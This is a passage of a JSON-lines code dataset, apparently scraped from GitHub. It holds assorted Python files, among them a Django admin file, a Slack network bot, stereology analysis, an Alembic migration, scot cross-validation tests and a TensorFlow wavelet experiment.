otherwise feels like you keep a ton of stuff in memory for lookups...\n # writer.write(\n # ItemNode(inVs=[jedi_reference_def.id], outV=reference_result_node.id, document=document_node).serialize()\n # )\n\n writer.write(ContainsNode(inVs=[x.id for x in contained_ranges], outV=document_node.id).serialize())\n\n print(\"module paths:\", module_path_to_document_node)\n print(\"definition names:\", names_to_result_sets)\n writer.write(ContainsNode(inVs=document_ids, outV=project_node.id).serialize())\n\n\ndef index_to_file(project_root: Path) -> None:\n with open(\"dump.lsif\", \"w\") as writer:\n index(project_root, writer)\n","repo_name":"tjdevries/lsif-python-tmp","sub_path":"src/lsif/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70740907042","text":"from django.contrib import admin\nfrom .models import Vendor, OpeningHour\n\n# Register your models here.\n@admin.register(Vendor)\nclass VendorAdmin(admin.ModelAdmin):\n list_display = [\n 'user', 'vendor_name', 'vendor_license', 'is_approved'\n ]\n\n list_display_links = [\n 'user', 'vendor_name'\n ]\n\n list_editable = [\n 'is_approved'\n ]\n\n prepopulated_fields= {\n 'vendor_slug':('vendor_name',)\n }\n\n\n@admin.register(OpeningHour)\nclass OpeningHourAdmin(admin.ModelAdmin):\n list_display= [\n 'vendor', 'day', 'from_hour', 'to_hour'\n ]\n\n","repo_name":"kgawas9/djangoOnlineFood","sub_path":"vendor/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43463547341","text":"import main\nimport time\n\nn = 6\n\nm = 3\n\nk = 2\n\nanimales = [\n (\"ciempies\", 1),\n (\"libelula\", 2),\n (\"gato\", 3),\n (\"perro\", 4),\n (\"tapir\", 5),\n (\"nutria\", 6)\n]\n\napertura = [[\"tapir\", \"nutria\", \"perro\"], [\"tapir\", \"perro\", \"gato\"], [\"ciempies\", \"tapir\", \"gato\"],\n [\"gato\", \"ciempies\", \"libelula\"]]\n\npartes = [[[\"tapir\", \"nutria\", \"perro\"], [\"ciempies\", \"tapir\", \"gato\"]],\n [[\"gato\", \"ciempies\", \"libelula\"], [\"tapir\", \"perro\", \"gato\"]]\n ]\n\n\nprint(\"total escenas: \", ((m-1)*k)*2 )\n#Llamar mi función\ninicioTiempo=time.time()*1000\n#main.espectaculo(n, m, k, animales, apertura, partes,'insertion_sort')\nmain.espectaculo(n, m, k, animales, apertura, partes,'any_sort')\n#main.espectaculo(n, m, k, animales, apertura, partes,'another_sort')\nfinalTiempo=time.time()*1000\nprint('TIEMPO DEL ALGORITMO: ', (finalTiempo-inicioTiempo))","repo_name":"Deisy05/zoologicoCaliADAI","sub_path":"ejemplosI.py","file_name":"ejemplosI.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72795113761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 10 12:52:11 2015\n\nStereology Analysis:\nReads through a series of csvs containing exported StereoInvestigator cell\ncount data and produces a set of DataFrames containing information on ratios between available\ncell types (Arc/NeuN, Arc/DAPI, NeuN/DAPI)\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n\ndef get_frame(filename, region):\n '''\n Creates a list of dataframes containing all counting data for desired region\n '''\n os.chdir(filename)\n framelist = []\n indexframe = 
pd.DataFrame(np.zeros((0,1)),columns = ['Number'])\n index = pd.DataFrame(np.zeros((1,1)),columns = ['Number'])\n \n for i in np.arange(1,24):\n filename = str(i) + region + '.csv'\n print(filename)\n if os.path.isfile(filename):\n frame = pd.read_csv(str(i)+region+'.csv', index_col='Marker', engine='python')\n framelist.append(frame)\n index.iloc[0] = i\n indexframe = indexframe.append(index)\n os.chdir(os.pardir)\n \n return framelist, indexframe\n \ndef create_ratioframe(framelist):\n '''\n loops through framelist, creating a dataframe with ratio data for each mouse\n '''\n ratioframe = pd.DataFrame(np.zeros((0,5)),columns = ['Arc/Neun','Arc/DAPI','NeuN/DAPI',\n 'Estimated Population using Mean Section Thickness','Coefficient of Error (Gundersen), m=1'])\n ratios = pd.DataFrame(np.zeros((1,5)),columns = ['Arc/Neun','Arc/DAPI','NeuN/DAPI',\n 'Estimated Population using Mean Section Thickness','Coefficient of Error (Gundersen), m=1'])\n \n \n for i in framelist:\n \n if 'colabel' in i.index.values.tolist():\n arcneun = (i['Total Markers Counted']['brdu'] / (i['Total Markers Counted']['colabel']))*100\n arcdapi = np.nan\n ce = np.nan\n neundapi = np.nan\n estpop = i['Estimated Population using Mean Section Thickness']['brdu']\n ce = i['Coefficient of Error (Gundersen), m=1']['brdu']\n if 'cfos' in i.index.values.tolist():\n arcdapi = (i['Total Markers Counted']['brdu'] / i['Total Markers Counted']['cfos'])*100\n neundapi = (i['Total Markers Counted']['colabel'] / i['Total Markers Counted']['cfos'])*100\n elif 'cfos' in i.index.values.tolist():\n arcdapi = (i['Total Markers Counted']['brdu'] / (i['Total Markers Counted']['cfos']))*100\n estpop = i['Estimated Population using Mean Section Thickness']['brdu']\n arcneun = np.nan\n neundapi = np.nan\n print(i.index.values.tolist())\n ce = 'placehold'\n \n ratios.iloc[0] = [arcneun,arcdapi,neundapi,estpop, ce]\n ratioframe = ratioframe.append(ratios)\n \n #Stores blinded index number of each mouse by removing the final 4chars (ie. 
'.DAT') from filename\n \n \n \n return ratioframe\n\ndef assign_groups(key, ratioframe, index):\n '''\n Assigns real mouse names and groups to ratioframe based on key\n '''\n Key = pd.read_csv(key,index_col='Number')\n ratioframe.index=index['Number']\n ratioframe['Name'] = Key['Name']\n ratioframe['Group'] = Key['Group']\n\n return ratioframe\n \ndef make_tables(ratioframe):\n '''\n Constructs DataFrame tables of ratio data based on group ID\n '''\n \n ArcNeunRatio = ratioframe.pivot('Name','Group', values='Arc/Neun').sort_index(axis=1,\n ascending=False)\n \n NeunDAPIRatio = ratioframe.pivot('Name','Group', values='NeuN/DAPI').sort_index(axis=1,\n ascending=False)\n \n EstPop = ratioframe.pivot('Name','Group', values='Estimated Population using Mean Section Thickness').sort_index(axis=1,\n ascending=False)\n \n ArcDapi = ratioframe.pivot('Name','Group', values='Arc/DAPI').sort_index(axis=1,\n ascending=False)\n \n return ArcNeunRatio, NeunDAPIRatio, EstPop, ArcDapi\n\nif __name__ == \"__main__\":\n framelist, index = get_frame('PV Total Proportion','BA')\n ratioframe = create_ratioframe(framelist)\n ratioframe = assign_groups('PV Stereology Key.csv', ratioframe, index)\n ArcNeunRatio, NeunDAPIRatio, EstPop, ArcDapi = make_tables(ratioframe)\n \n ax = sns.barplot(x='Group', y='Arc/DAPI', data=ratioframe)","repo_name":"jdpigeon/Cell-Count-Analysis","sub_path":"StereologyCount.py","file_name":"StereologyCount.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18245015231","text":"'''\r\nWe define f(X, Y) as number of different corresponding bits in binary representation of X and Y. For example, f(2, 7) = 2, since binary representation of 2 and 7 are 010 and 111, respectively. The first and the third bit differ, so f(2, 7) = 2.\r\n\r\nYou are given an array of N positive integers, A1, A2 ,…, AN. Find sum of f(Ai, Aj) for all pairs (i, j) such that 1 ≤ i, j ≤ N. 
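(Per bit position, if a of the numbers have a 0 there and b have a 1, ordered pairs contribute 2*a*b differing bits, so the total is just the sum of 2*a*b over all 32 positions.) 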
Return the answer modulo 10^9 + 7.\r\n\r\nFor example,\r\n\r\nA=[1, 3, 5]\r\n\r\nWe return\r\n\r\nf(1, 1) + f(1, 3) + f(1, 5) + \r\nf(3, 1) + f(3, 3) + f(3, 5) +\r\nf(5, 1) + f(5, 3) + f(5, 5) =\r\n\r\n0 + 1 + 1 +\r\n1 + 0 + 2 +\r\n1 + 2 + 0 = 8\r\n'''\r\nclass Solution:\r\n    # @param A : list of integers\r\n    # @return an integer\r\n    def cntBits(self, A):\r\n        l=[]\r\n        c=0\r\n        # 32-bit binary string for every number, then transpose to walk bit columns\r\n        for i in A:\r\n            l.append(\"{:032b}\".format(i))\r\n        \r\n        l = list(zip(*l))\r\n        \r\n        for i in l:\r\n            a=i.count('0')\r\n            b=i.count('1')\r\n            # a zeros and b ones in this column -> 2*a*b ordered pairs differ here\r\n            c+=(2*a*b)\r\n        \r\n        return c%1000000007","repo_name":"sharmaji27/InterviewBit-Problems","sub_path":"Bit Manipulation/Different Bits Sum Pairwise.py","file_name":"Different Bits Sum Pairwise.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
+{"seq_id":"34437825248","text":"from oarepo_ui.resources.config import RecordsUIResourceConfig\n\n\nclass OAIHarvesterUIResourceConfig(RecordsUIResourceConfig):\n    template_folder = \"../templates\"\n    url_prefix = \"/oaiharvester/\"\n    blueprint_name = \"oai-harvester-ui\"\n    ui_serializer_class = \"oarepo_oaipmh_harvester.oai_harvester.resources.records.ui.OaiHarvesterUIJSONSerializer\"\n    api_service = \"oarepo-oaipmh-harvester\"\n    layout = \"oarepo-oaipmh-harvester\"\n\n    templates = {\n        \"detail\": {\n            \"layout\": \"oai_harvester_ui/HarvesterDetail.html.jinja\",\n            \"blocks\": {\n                \"record_main_content\": \"HarvesterMain\",\n                \"record_sidebar\": \"HarvesterSidebar\",\n            },\n        },\n        \"search\": {\n            \"layout\": \"oai_harvester_ui/HarvesterSearch.jinja\",\n            \"app_id\": \"OaiHarvester.Search\",\n        },\n    }\n\n    routes = {\n        \"search\": \"\",\n        \"detail\": \"/<pid_value>\",\n        \"export\": \"/<pid_value>/export/<export_format>\",\n    }\n\n    def search_active_facets(self, api_config, identity):\n        return list(self.search_available_facets(api_config, identity).keys())\n","repo_name":"oarepo/oarepo-oai-pmh-harvester","sub_path":"oarepo_oaipmh_harvester/ui/oai_harvester/resources/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"19578305656","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndata = np.genfromtxt(\"RungeKutta.dat\")\n\ntime = data[:,0]\npos = data[:,1]\nvelo = data[:,2]\n\nplt.figure(figsize=(10,8))\nplt.plot(time, pos,label=\"$Posición$\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.ylabel('$x(m)$')\nplt.legend()\nplt.savefig(\"RungePos\")\n\nplt.figure(figsize=(10,8))\nplt.plot(time, velo,label=\"$Velocidad$\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.ylabel('$v(m/s)$')\nplt.legend()\nplt.savefig(\"RungeVelo\")\n\nplt.figure(figsize=(10,8))\nplt.plot(time, velo,label=\"$Velocidad$\",c=\"r\")\nplt.plot(time, pos,label=\"$Posición$\",c=\"g\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.legend()\nplt.savefig(\"Runge\")","repo_name":"metodos-computacionales-1/ejercicio-14-segunda-parte-DavidV4rg","sub_path":"parte2/Grafica1.py","file_name":"Grafica1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"14116483861","text":"\"\"\"Added User model\n\nRevision ID: 186be741cd49\nRevises: 37b8d137fd24\nCreate Date: 2023-03-08 12:19:10.248405\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '186be741cd49'\ndown_revision = '37b8d137fd24'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n    # ### 
commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('full_name', sa.String(), nullable=True),\n sa.Column('city', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"KarimAreeb273/Halal-Food-Finder","sub_path":"lib/migrations/versions/186be741cd49_added_user_model.py","file_name":"186be741cd49_added_user_model.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20383616337","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndf = pd.read_csv('car driving risk analysis.csv')\r\n#print(df)\r\nx = df[['speed']]\r\ny = df['risk']\r\n\r\n#print(df.head(5))\r\n#print(df.shape)\r\n#print(df.isnull().any())\r\n#print(x)\r\n#print(y)\r\n\r\n#plt.scatter(df['speed'],df['risk'])\r\n#plt.show()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nxtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=0.60, random_state=1)\r\n#print(xtrain)\r\n#print(xtest)\r\nfrom sklearn.linear_model import LinearRegression\r\nreg = LinearRegression()\r\nreg.fit(xtrain,ytrain)\r\n#print(reg.predict(xtest))\r\n\r\nplt.scatter(df['speed'],df['risk'])\r\nplt.plot(df.speed, reg.predict(df[[\"speed\"]]))\r\nplt.show()\r\n\r\nprint(reg.predict([[300]]))\r\nprint(reg.coef_)\r\nprint(reg.intercept_)\r\n\r\n\r\n\r\n","repo_name":"Akash-Ahmed-CSE/Python","sub_path":"Basic coding/Linear Regression in Machine Learning.py","file_name":"Linear Regression in Machine Learning.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13607923287","text":"import os\nimport logging\nfrom flask import Flask\nfrom slack import WebClient\nfrom slackeventsapi import SlackEventAdapter\nfrom coinbot import CoinBot\nfrom get_network import NetBot\n\n# Initialize a Flask app to host the events adapter\napp = Flask(__name__)\n\n# Create an events adapter and register it to an endpoint in the slack app for event ingestion.\nslack_events_adapter = SlackEventAdapter(\n os.environ.get(\"SLACK_EVENTS_TOKEN\"), \"/slack/events\", app\n)\n\n# Initialize a Web API client\nslack_web_client = WebClient(token=os.environ.get(\"SLACK_TOKEN\"))\n\n# Define bot ID so it will not respond to itself\nBOT_ID = slack_web_client.api_call(\"auth.test\")[\"user_id\"]\n\n\ndef flip_coin(channel):\n \"\"\"\n Craft the CoinBot, flip the coin and send the message to the channel\n \"\"\"\n # Create a new CoinBot\n coin_bot = CoinBot(channel)\n\n # Get the onboarding message payload\n my_message = coin_bot.get_message_payload()\n\n # Post the onboarding message in Slack\n slack_web_client.chat_postMessage(**my_message)\n\n\ndef send_me_help(channel, device_name):\n \"\"\"\n run send_help method\n \"\"\"\n net_bot = NetBot(channel, device_name)\n file_output = net_bot.send_help()\n slack_web_client.files_upload(**file_output)\n\n\ndef get_network_info(channel, device_name):\n \"\"\"\n run the get_message_payload and get_file_upload method\n \"\"\"\n net_bot = NetBot(channel, device_name)\n my_message = net_bot.get_message_payload()\n file_output = net_bot.get_file_payload()\n 
slack_web_client.chat_postMessage(**my_message)\n    slack_web_client.files_upload(**file_output)\n\n\n# When a 'message' event is detected by the events adapter, forward that payload\n# to this function.\n@slack_events_adapter.on(\"message\")\ndef message(payload):\n    \"\"\"\n    Parse the message event and, if an activation phrase is in the text,\n    run the matching command and send the result to the channel.\n    \"\"\"\n\n    # Get various portions of the message\n    event = payload.get(\"event\", {})\n    text = event.get(\"text\")\n    user_id = event.get(\"user\")\n    timestamp = event.get(\"ts\")\n    channel_id = event.get(\"channel\")\n\n    # Make sure the bot doesn't respond to itself (and skip events without text)\n    if text and BOT_ID != user_id:\n        # Check and see if the activation phrase was in the text of the message.\n        # If so, execute the code to flip a coin.\n        if \"hey netbot flip coin\" in text.lower():\n            # Execute the flip_coin function and send the results of\n            # flipping a coin to the channel\n            return flip_coin(channel_id)\n\n        if \"netbot get network interfaces\" in text.lower():\n            full_text = text.split()\n            device = full_text[-1]\n            my_device = device.replace(\"device=\", \"\")\n            slack_web_client.reactions_add(\n                channel=channel_id, name=\"robot_face\", timestamp=timestamp\n            )\n            slack_web_client.reactions_add(\n                channel=channel_id, name=\"rocket\", timestamp=timestamp\n            )\n            return get_network_info(channel_id, device_name=my_device)\n\n        if \"netbot help\" in text.lower():\n            slack_web_client.reactions_add(\n                channel=channel_id, name=\"sos\", timestamp=timestamp\n            )\n            slack_web_client.reactions_add(\n                channel=channel_id, name=\"interrobang\", timestamp=timestamp\n            )\n            return send_me_help(channel_id, device_name=\"\")\n
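\n# Example activation phrases the handler above matches (the device name is\n# illustrative, not from the original repo):\n#   \"hey netbot flip coin\"\n#   \"netbot get network interfaces device=router1\"\n#   \"netbot help\"\n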
\n\nif __name__ == \"__main__\":\n    # Create the logging object\n    logger = logging.getLogger()\n\n    # Set the log level to DEBUG. This will increase the verbosity of logging messages\n    logger.setLevel(logging.DEBUG)\n\n    # Add the StreamHandler as a logging handler\n    logger.addHandler(logging.StreamHandler())\n\n    # Run your app on your externally facing IP address on port 3000 instead of\n    # running it on localhost, which is traditional for development.\n    app.run(host=\"0.0.0.0\", port=3000)\n","repo_name":"JulioPDX/ne_bot_example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
+{"seq_id":"13347256784","text":"from django.http import Http404\nfrom rest_framework import status\nfrom rest_framework.generics import RetrieveAPIView, UpdateAPIView, CreateAPIView\nfrom rest_framework.response import Response\n\nfrom api.permissions import IsCustomer\nfrom api.serializers.users import SettingsSerializer, SettingsCreateSettings, UserSerializer\nfrom settings import models\n\n\nclass User(RetrieveAPIView):\n    permission_classes = (IsCustomer,)\n    serializer_class = UserSerializer\n\n    def get_object(self, *args, **kwargs):\n        return self.request.user\n\n\nclass SettingsCreateAPIView(CreateAPIView):\n    permission_classes = (IsCustomer,)\n    serializer_class = SettingsCreateSettings\n\n    def create(self, request, *args, **kwargs):\n        user = request.user\n        settings = models.Settings.objects.filter(user=user).first()\n        if settings:\n            serializer = self.get_serializer(settings, data=request.data)\n        else:\n            serializer = self.get_serializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        serializer.save(user=user)\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass SettingsRetrieveAPIView(RetrieveAPIView):\n    permission_classes = (IsCustomer,)\n    serializer_class = SettingsSerializer\n    queryset = models.Settings.objects.all()\n\n    def get_object(self):\n        user = self.request.user\n        settings = models.Settings.objects.filter(user=user).first()\n        if not settings:\n            raise Http404\n        return settings\n\n    def get(self, request, *args, **kwargs):\n        instance = self.get_object()\n        serializer = self.get_serializer(instance)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass SettingsUpdateAPIView(UpdateAPIView):\n    permission_classes = (IsCustomer,)\n    serializer_class = SettingsSerializer\n\n    def get_object(self):\n        user = self.request.user\n        # filter() returns a queryset; the serializer needs a single model instance\n        settings = models.Settings.objects.filter(user=user).first()\n        if not settings:\n            raise Http404\n        return settings\n\n    def update(self, request, *args, **kwargs):\n        partial = kwargs.pop('partial', False)\n        instance = self.get_object()\n        serializer = self.get_serializer(instance, data=request.data, partial=partial)\n        serializer.is_valid(raise_exception=True)\n        serializer.save()\n        return Response(serializer.data, status=status.HTTP_200_OK)\n","repo_name":"Kuzibaev/kpay_merchant_multitenant","sub_path":"api/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"28626650585","text":"from itertools import cycle\n\nwith open('input/01.txt', 'r') as file:\n    my_data = file.read().split()\n\n# Part 1\nnums = list(map(int, my_data))\nprint('Part 1:', sum(nums))\n\n# Part 2\n
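# Walk the repeating frequency changes until a running total is seen twice.\n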
seen = set([0])\nssum = 0\ncnums = cycle(nums)\n\nwhile True:\n    ssum += next(cnums)\n    if ssum in seen:\n        break\n    seen.add(ssum)\n\nprint('Part 2:', ssum)\n","repo_name":"oski89/AoC","sub_path":"2018/day-01.py","file_name":"day-01.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"13607923287","text":"\nimport numpy as np\n\n\ndef gradient_descent(alpha, trainx, trainy, testx, testy, numiter, epsilon):\n    theta = np.zeros(len(trainx[0]))\n    m = len(trainy)\n    arrcost = []\n    for _ in range(1,numiter):\n        pred = np.dot(trainx, theta)\n        temp = np.dot((pred - trainy), trainx)\n        theta = theta - ((alpha / m) * temp)\n        val = np.sum((np.dot(trainx,theta) - trainy) / m)\n        arrcost.append(np.abs(val))\n        if(np.abs(val) < epsilon):\n            break\n    #return {'cost': arrcost, 'theta': theta }\n\n    # percentage of test samples whose rounded prediction matches the label\n    pred = np.dot(testx, theta)\n    error = np.true_divide(len(pred[np.round(pred) == testy]), len(testy)) * 100\n    #return {'cost': arrcost, 'theta': theta}\n    return error","repo_name":"sumukh210991/Living_Indicator","sub_path":"Code/classGradientDescent.py","file_name":"classGradientDescent.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"39008100275","text":"import unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nimport scot.xvschema\n\n\nclass TestBuiltin(unittest.TestCase):\n    def setUp(self):\n        pass\n\n    def tearDown(self):\n        pass\n\n    def test_singletrial(self):\n        n_trials = 10\n        xv = scot.xvschema.singletrial(n_trials)\n        for n, (train, test) in enumerate(xv):\n            self.assertEqual(len(train), 1)\n            self.assertEqual(len(test), n_trials - 1)\n\n            for t in train:\n                self.assertTrue(t not in test)\n\n            self.assertEqual(train[0], n)\n\n    def test_multitrial(self):\n        n_trials = 10\n        xv = scot.xvschema.multitrial(n_trials)\n        for n, (train, test) in enumerate(xv):\n            self.assertEqual(len(test), 1)\n            self.assertEqual(len(train), n_trials - 1)\n\n            for t in train:\n                self.assertTrue(t not in test)\n\n            self.assertEqual(test[0], n)\n\n    def test_splitset(self):\n        n_trials = 10\n        xv = scot.xvschema.splitset(n_trials)\n        for n, (train, test) in enumerate(xv):\n            self.assertEqual(len(test), n_trials // 2)\n            self.assertEqual(len(train), n_trials // 2)\n\n            for t in train:\n                self.assertTrue(t not in test)\n\n    def test_nfold(self):\n        n_trials = 50\n        n_blocks = 5\n        xv = scot.xvschema.make_nfold(n_blocks)(n_trials)\n        for n, (train, test) in enumerate(xv):\n            self.assertEqual(len(test), n_trials // n_blocks)\n            self.assertEqual(len(train), n_trials - n_trials // n_blocks)\n\n            for t in train:\n                self.assertTrue(t not in test)\n        self.assertEqual(n + 1, n_blocks)\n\n\nclass TestSklearn(unittest.TestCase):\n    def setUp(self):\n        try:\n            import sklearn\n        except ImportError:\n            self.skipTest(\"could not import scikit-learn\")\n\n    def tearDown(self):\n        pass\n\n    def test_leave1out(self):\n        from sklearn.model_selection import LeaveOneOut\n        n_trials = 10\n        xv1 = scot.xvschema.multitrial(n_trials)\n        xv2 = LeaveOneOut().split(np.arange(n_trials))\n        self._comparexv(xv1, xv2)\n\n    def test_kfold(self):\n        from sklearn.model_selection import KFold\n        n_trials = 15\n        n_blocks = 5\n        xv1 = scot.xvschema.make_nfold(n_blocks)(n_trials)\n        xv2 = KFold(n_splits=n_blocks, shuffle=False).split(np.arange(n_trials))\n        self._comparexv(xv1, xv2)\n\n    def test_application(self):\n        from scot.var import VAR\n        from sklearn.model_selection import LeaveOneOut, KFold\n        np.random.seed(42)\n        x = np.random.randn(10, 3, 15)\n\n        var = VAR(3, xvschema=lambda n, _: LeaveOneOut().split(range(n))).optimize_delta_bisection(x)\n
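        # Bisection is expected to settle on a strictly positive ridge penalty.\n        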
self.assertGreater(var.delta, 0)\n        var = VAR(3, xvschema=lambda n, _: KFold(5).split(range(n))).optimize_delta_bisection(x)\n        self.assertGreater(var.delta, 0)\n\n    def _comparexv(self, xv1, xv2):\n        for (a, b), (c, d) in zip(xv1, xv2):\n            assert_array_equal(a, c)\n            assert_array_equal(b, d)\n","repo_name":"scot-dev/scot","sub_path":"scot/tests/test_xvschema.py","file_name":"test_xvschema.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"54"}
+{"seq_id":"32231549181","text":"import cv2\nimport math\nimport pywt\nimport numpy as np\nimport models.DWT2\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n# load Lenna image\nimg_in = cv2.imread(\"../input/Lenna_Orig.png\")\nimg_grey = cv2.cvtColor(img_in, cv2.COLOR_RGB2GRAY)\nw, h = img_grey.shape\n\n# load DWT model\nmodel = keras.Sequential()\nmodel.add(keras.Input(shape=(512, 512, 1)))\nmodel.add(models.DWT2.DWT())\nmodel.summary()\n\n# convert input image to tensor in order to pass to model\nimg_grey = tf.expand_dims(img_grey, axis=0)\nimg_grey = tf.expand_dims(img_grey, axis=-1)\ncoeffs = model.predict(img_grey, steps=1)\n\n# convert model output to images\n# cA = tf.image.convert_image_dtype(coeffs[0, ..., 0], dtype=tf.float32)\n# cH = tf.image.convert_image_dtype(coeffs[0, ..., 1], dtype=tf.float32)\n# cV = tf.image.convert_image_dtype(coeffs[0, ..., 2], dtype=tf.float32)\n# cD = tf.image.convert_image_dtype(coeffs[0, ..., 3], dtype=tf.float32)\n#\n# with tf.Session() as sess:\n# cA = sess.run(cA)\n# cH = sess.run(cH)\n# cV = sess.run(cV)\n# cD = sess.run(cD)\n\n\n# 3rd party library to compare results\n# coeffs = pywt.dwt2(img_grey, 'db2')\n# cA, (cH, cV, cD) = coeffs\n\n\n# convert coeffs into tensor for IDWT model\n# cA = tf.constant(cA)\n# cA = tf.expand_dims(cA, axis=-1)\n# cH = tf.constant(cH)\n# cH = tf.expand_dims(cH, axis=-1)\n# cV = tf.constant(cV)\n# cV = tf.expand_dims(cV, axis=-1)\n# cD = tf.constant(cD)\n# cD = tf.expand_dims(cD, axis=-1)\n# x = tf.concat([cA, cH, cV, cD], axis=-1)\n# x = tf.expand_dims(x, axis=0)\n\n\n\n# symmetric border padding of columns for convolution\nx = tf.pad(coeffs, [[0, 0], [0, 0], [3, 3], [0, 0]], \"SYMMETRIC\")\nx = tf.cast(x, tf.float32)\n\n# calculate the db2 coefficients\ndb2_h0 = (1+math.sqrt(3))/(4*math.sqrt(2))\ndb2_h1 = (3+math.sqrt(3))/(4*math.sqrt(2))\ndb2_h2 = (3-math.sqrt(3))/(4*math.sqrt(2))\ndb2_h3 = (1-math.sqrt(3))/(4*math.sqrt(2))\n\n# Reconstruction LPF and HPF\ndb2_lpfR = [db2_h3, db2_h2, db2_h1, db2_h0]\ndb2_hpfR = [-db2_h0, db2_h1, -db2_h2, db2_h3]\nprint(db2_lpfR)\nprint(db2_hpfR)\n# convert to matrix for conv2d\ndb2_lpf = tf.constant(db2_lpfR)\ndb2_lpf = tf.reshape(db2_lpf, (1, 4, 1, 1))\n# db2_lpf = tf.repeat(db2_lpf, 4, axis=-1)\n\ndb2_hpf = tf.constant(db2_hpfR)\ndb2_hpf = tf.reshape(db2_hpf, (1, 4, 1, 1))\n# db2_hpf = tf.repeat(db2_hpf, 4, axis=-1)\n\n# upsampling -> padding zeros between all elements\nLL = tf.expand_dims(x[:,:,:,0], axis=-1)\nLH = tf.expand_dims(x[:,:,:,1], axis=-1)\nHL = tf.expand_dims(x[:,:,:,2], axis=-1)\nHH = tf.expand_dims(x[:,:,:,3], axis=-1)\n\ndef upsampler(x):\n    zero_tensor = tf.zeros(shape=x.shape, dtype=tf.float32)\n    stack_rows = tf.stack([x, zero_tensor], axis=3)\n    stack_rows = tf.reshape(stack_rows, shape=[x.shape[0], x.shape[1], x.shape[2]*2, x.shape[3]])\n    stack_rows = tf.transpose(stack_rows, perm=[0, 2, 1, 3])\n    zero_tensor_1 = tf.zeros(shape=stack_rows.shape, dtype=tf.float32)\n\n    stack_rows_cols = tf.stack([stack_rows, 
zero_tensor_1], axis=3)\n us_padded = tf.reshape(stack_rows_cols, shape=[x.shape[0], x.shape[1]*2, x.shape[2]*2, x.shape[3]])\n\n us_padded = tf.transpose(us_padded, perm=[0, 2, 1, 3])\n return us_padded\n\n\nLL_us_pad = upsampler(LL)\nLH_us_pad = upsampler(LH)\nHL_us_pad = upsampler(HL)\nHH_us_pad = upsampler(HH)\n\n\nzero_tensor = tf.zeros(shape=x.shape, dtype=tf.float32)\nc = tf.stack([x, zero_tensor], axis=4)\na_us = tf.reshape(c, shape=[x.shape[0], x.shape[1], x.shape[2]*2, x.shape[3]])\n\nzero_tensor_n = tf.zeros(shape=a_us.shape, dtype=tf.float32)\n\nd = tf.stack([a_us, zero_tensor_n], axis=3)\na_us_us = tf.reshape(d, shape=[x.shape[0], x.shape[1]*2, x.shape[2]*2, x.shape[3]])\n\n\nLL_us_pad = tf.expand_dims(a_us_us[:,:,:,0], axis=-1)\nLH_us_pad = tf.expand_dims(a_us_us[:,:,:,1], axis=-1)\nHL_us_pad = tf.expand_dims(a_us_us[:,:,:,2], axis=-1)\nHH_us_pad = tf.expand_dims(a_us_us[:,:,:,3], axis=-1)\n\npadd_type = 'VALID'\nLL_conv_lpf = tf.nn.conv2d(LL_us_pad, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\n\nLL_conv_lpf_tr = tf.transpose(LL_conv_lpf, perm=[0, 2, 1, 3])\nLL_conv_lpf_lpf = 